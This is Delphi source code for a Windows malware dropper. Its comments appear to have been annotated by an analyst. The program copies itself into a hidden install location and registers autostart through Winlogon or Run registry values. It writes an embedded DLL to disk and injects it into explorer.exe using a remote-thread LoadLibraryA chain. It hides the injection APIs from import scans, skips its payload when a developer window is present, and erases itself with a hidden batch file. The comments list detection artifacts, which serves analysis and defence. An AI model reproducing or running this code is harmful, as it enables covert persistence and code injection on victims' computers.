program Main;
uses
windows,
RejoiceBase,
SysUtils2,
SysUtils,
tlhelp32,
Reg;
{$L 'SRT.obj'} // linked object file; the three `external` functions below carry no DLL name, so this is presumably where they resolve — TODO confirm
{$R RSRC.RES} // resource file; the main block extracts the resource 'dllfile' / 'mydll' from it and writes it to disk as the DLL
{$warn SYMBOL_PLATFORM OFF} // silences: [Warning] main.DPR(130): Symbol 'FileSetAttr' is specific to a platform
var
ExeFiles: PChar = '123.exe'; // file name of the copy this program installs into the Gesy directory (see the main block)
DLLFiles: PChar = '123.dll'; // file name of the DLL extracted from the resource and injected
IEFiles: PChar = 'EXPLORER.EXE'; // name of the host process the DLL is injected into; never reassigned in this file
PID: DWORD; // id of the host process, from GetProcessID
Process: DWORD; // handle to the host process, from OpenProcess
DllAllpath: string; // full path of the dropped DLL (may be changed by RandomFilename)
StartInfo: TStartupInfo; // used only by the IEXPLORE.EXE branch of the main block; never zero-filled in this file
ProcInfo: TProcessInformation; // likewise
// The three x-prefixed functions are declared `external` without a library name, i.e. they are resolved from
// linked object code rather than imported from kernel32 by name. For analysts: a static import-table scan may
// therefore not list VirtualAllocEx / CreateRemoteThread / VirtualFreeEx even though InjectLibrary performs
// remote-thread DLL injection. That SRT.obj supplies them is an assumption — not verifiable here.
function xVirtualFreeEx(hProcess: LongWord; lpAddress: Pointer; dwSize: LOngWord; dwFreeType: LongWord): Boolean; stdcall; external;
function xCreateRemoteThread(hProcess: LongWord; lpThreadAttributes: Pointer; dwStackSize: LongWord; lpStartAddress: Pointer; lpParameter: Pointer; dwCreationFlags: LongWord; lpThreadId: Pointer): LongWord; stdcall; external;
// Shadows SysUtils.FileExists for the rest of this file with shlwapi's PathFileExistsA. A Delphi `string` is
// handed to an LPCSTR parameter; that works because long strings are null-terminated, presumably with an
// empty string arriving as nil — not verified.
function FileExists(pszPath: string): BOOL; stdcall; external 'shlwapi.dll' Name 'PathFileExistsA';
function xVirtualAllocEx(hProcess: LongWord; lpAddress: Pointer; dwSize: LongWord; flAllocationType: LongWord; flProtect: LongWord): Pointer; stdcall; external;
//---------------- self-deletion helper (the original header called this a file-time modifier; nothing below touches timestamps)
procedure ExtDelMe; // removes the file this process was launched from, via a helper batch file
var
F: textfile;
BatchFileName: string; // Gesy + 'Deleteme.bat' — a recognisable on-disk artifact
ProcessInfo: TProcessInformation;
StartUpInfo: TStartupInfo;
begin
// Removes a WinOldApp policy value first; unrelated to the deletion below, and its purpose is not visible here.
DelValue(HKEY_CURRENT_USER, 'Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp', 'NoRealMode');
BatchFileName := Gesy + 'Deleteme.bat';
// Write a batch file that keeps retrying `del` on this executable until the file is gone (the delete can
// only succeed once this process has exited), then deletes itself with `del %0`.
// With default I/O checking, Rewrite raises if the file cannot be created; nothing here catches that.
AssignFile(F, BatchFileName);
Rewrite(F);
WriteLn(F, ':try');
WriteLn(F, 'del "' + ParamStr(0) + '"'); // ParamStr(0): full path of the running executable
WriteLn(F, 'if exist "' + ParamStr(0) + '"' + ' goto try');
WriteLn(F, 'del %0');
CloseFile(F);
FillChar(StartUpInfo, SizeOf(StartUpInfo), $00); // note: cb is left at 0
StartUpInfo.dwFlags := STARTF_USESHOWWINDOW;
StartUpInfo.wShowWindow := SW_HIDE; // run the batch without a visible console window
// Launch the batch at idle priority and drop both handles at once; the batch keeps running after this process exits.
if CreateProcess(nil, PChar(BatchFileName), nil, nil, False, IDLE_PRIORITY_CLASS, nil, nil, StartUpInfo, ProcessInfo) then
begin
CloseHandle(ProcessInfo.hThread);
CloseHandle(ProcessInfo.hProcess);
end;
end;
function RandomFilename(aFilename: string): string; // picks an unused name beside aFilename: <dir><base><0..9998><ext>
var
Path, Filename, Ext: string;
begin
Result := aFilename; // overwritten by the loop below
Path := ExtractFilepath(aFilename);
Ext := ExtractFileExt(aFilename);
Filename := ExtractFilename(aFilename);
if Length(Ext) > 0 then
Filename := Copy(Filename, 1, Length(Filename) - Length(Ext)); // strip the extension from the base name
// Random(9999) yields 0..9998. No Randomize call is visible in this file, so unless a project unit seeds the
// generator, the sequence — and hence the names chosen — is the same on every run (a stable indicator).
// FileExists here is the shlwapi PathFileExistsA redeclared above. The loop ends only when a candidate is absent.
repeat
Result := Path + Filename + inttoStr(Random(9999)) + Ext;
until not FileExists(Result);
end;
function GetProcessID(sProcName: string): Integer; // id of the first process whose image base name equals sProcName (case-insensitive); -1 if none match or the snapshot fails
var
hProcSnap: THandle;
pe32: TProcessEntry32;
begin
Result := -1;
hProcSnap := CreateToolHelp32SnapShot(TH32CS_SNAPPROCESS, 0); // Toolhelp32 snapshot of all processes
if hProcSnap = INVALID_HANDLE_VALUE then Exit;
pe32.dwSize := SizeOf(ProcessEntry32);
// The entry filled by Process32First is used only as a guard; comparisons start with Process32Next,
// so the first entry of the snapshot is never examined.
if Process32First(hProcSnap, pe32) = True then
while Process32Next(hProcSnap, pe32) = True do
begin
if AnsiStricomp(PChar(ExtractFilename(pe32.szExefile)), PChar(ExtractFilename(sProcName))) = 0 then // base names only
begin
Result := pe32.th32ProcessID; // DWORD stored in an Integer; the caller converts it back
break;
end;
end;
CloseHandle(hProcSnap);
end;
// Remote DLL injection: the VirtualAllocEx -> WriteProcessMemory -> CreateRemoteThread(LoadLibraryA) sequence,
// routed through the x-prefixed externals linked from the object file instead of the kernel32 imports.
// For detection this is precisely the API chain EDR / ETW sensors look for: a remote thread in the host whose
// start address is LoadLibraryA, followed by a module load from the Gesy path.
function InjectLibrary(Process: LongWord; DLLPath: pChar): Boolean; // Process: open handle (PROCESS_ALL_ACCESS in the caller); DLLPath: null-terminated path; True on success
var
BytesWritten: DWORD;
Thread: DWORD; // handle of the remote thread; 0 on failure
ThreadID: DWORD;
Parameters: Pointer; // page in the host process holding the DLL path
begin
Result := False;
Parameters := xVirtualAllocEx(Process, nil, 4096, MEM_COMMIT, PAGE_READWRITE); // one RW page in the host
if Parameters = nil then Exit;
// Copies a full 4096 bytes starting at DLLPath regardless of the string's length, so it reads past the end of
// the path buffer in this process; neither the return value nor BytesWritten is checked.
WriteProcessMemory(Process, Parameters, Pointer(DLLPath), 4096, BytesWritten);
// LoadLibraryA is resolved in this process and reused as the remote start address, which assumes the same
// address is valid in the host process.
Thread := xCreateRemoteThread(Process, nil, 0, GetProcAddress(GetModuleHandle('KERNEL32.DLL'), 'LoadLibraryA'), Parameters, 0, @ThreadId);
// The wait and the free run even when Thread = 0; the failure test only comes afterwards.
WaitForSingleObject(Thread, INFINITE); // blocks until the remote LoadLibraryA returns
xVirtualFreeEx(Process, Parameters, 0, MEM_RELEASE);
if Thread = 0 then Exit;
CloseHandle(Thread);
Result := True;
end;
var
isSetup: Bool; // True once this run installed a copy of itself; a program-level global, so it is zero-initialised (False) when the install branch is skipped
SetupPathName: string; // install location: Gesy (from a project unit; presumably a fixed directory — TODO confirm) + ExeFiles
// Dropper flow, as the visible code runs it:
//   1. if not already running from SetupPathName: replace any existing copy there with this executable and
//      register it for autostart (an HKLM Winlogon value or an HKCU Run value, depending on judgesys);
//   2. unless a window 'Rejoice_3.2' / 'Windows IDE' exists: write the DLL resource to disk and inject it into
//      the process named by IEFiles (EXPLORER.EXE) through InjectLibrary;
//   3. if step 1 ran, remove the originally launched file through ExtDelMe; then Halt.
// Host artifacts a defender can look for: the dropped EXE and DLL under the Gesy path, the two registry values
// below, Deleteme.bat, and a remote thread / new module in explorer.exe.
begin
SetupPathName := Gesy + ExeFiles;
if (CompareText(paramstr(0), SetupPathName) <> 0) then // not yet running from the install location
begin
try
if FileExists(SetupPathName) then // shlwapi PathFileExistsA (redeclared above), not SysUtils.FileExists
begin
FilesetAttr(SetupPathName, 0); // clear read-only/hidden/system attributes so the delete can succeed; returns 0 on success, result ignored
DeleteFile(SetupPathName);
if FileExists(SetupPathName) then // the existing copy could not be removed: give up entirely
begin
Halt; // terminates the process
Exit; // unreachable after Halt
end;
end;
CopyFile(pchar(paramstr(0)), pchar(SetupPathName), False); // result not checked; a failed copy is silently ignored
except
end; // every exception from the block above is swallowed
isSetup := True;
if judgesys = 3 then // judgesys comes from a project unit; looks like an OS-version classifier — TODO confirm
begin
// HKLM persistence: a value named 'alalmn-Shell' under the Winlogon key with data 'Explorer.exe <installed path>'.
// The trailing 1 is presumably the value type (REG_SZ); Reg.AddValue is not visible here.
Reg.AddValue(HKEY_LOCAL_MACHINE, 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon', 'alalmn-Shell', pchar('Explorer.exe '+Gesy+ ExeFiles), 1);
end
else
begin
// HKCU persistence: a Run value named after the EXE, pointing at the installed copy.
Reg.AddValue(HKEY_CURRENT_USER, 'SoftWare\Microsoft\Windows\CurrentVersion\Run', ExeFiles, pchar(Gesy + ExeFiles), 1);
end;
end;
if FindWindow('Rejoice_3.2', 'Windows IDE') = 0 then // payload is skipped while this window class/title is present (presumably the author's IDE, i.e. a development/analysis guard — TODO confirm)
begin
DllAllpath := Gesy + DLLFiles; // default DLL drop path
try
FilesetAttr(DllAllpath, 0); // clear attributes on any previous DLL; returns 0 on success
DeleteFile(DllAllpath); // remove the previous DLL copy
except
end; // errors swallowed
if FileExists(DllAllpath) then // previous DLL still present (e.g. still loaded): fall back to a random name
begin
DllAllpath := RandomFilename(DllAllpath); // e.g. 123<n>.dll with n from Random(9999)
end;
if ExtractRes('dllfile', 'mydll', DllAllpath) then // write resource 'dllfile' / 'mydll' from RSRC.RES to disk (ExtractRes is from a project unit)
begin
if IEFiles = 'IEXPLORE.EXE' then // IEFiles is initialised to 'EXPLORER.EXE' and never reassigned in this file, so this condition appears never to hold; only the next line depends on it
CreateProcess(nil, PChar(IEPath), nil, nil, False, CREATE_SUSPENDED, nil, nil, StartInfo, ProcInfo); // IEPath is not declared in this file; StartInfo is never initialised
PID := GetProcessID(IEFiles); // -1 when not found; becomes DWORD $FFFFFFFF here, which presumably makes OpenProcess fail — not handled
Process := OpenProcess(PROCESS_ALL_ACCESS, False, PID); // full-access handle to explorer.exe; result not checked
FilesetAttr(DllAllpath, 0); // clear attributes on the freshly written DLL
InjectLibrary(Process, Pchar(DllAllpath)); // load the DLL inside the host; result ignored; Process is never closed
end;
end;
if isSetup then // only after a fresh install
Begin
ExtDelMe; // deletes the originally launched file (not a timestamp modifier, despite its original comment)
end;
Halt; // terminates the process
end.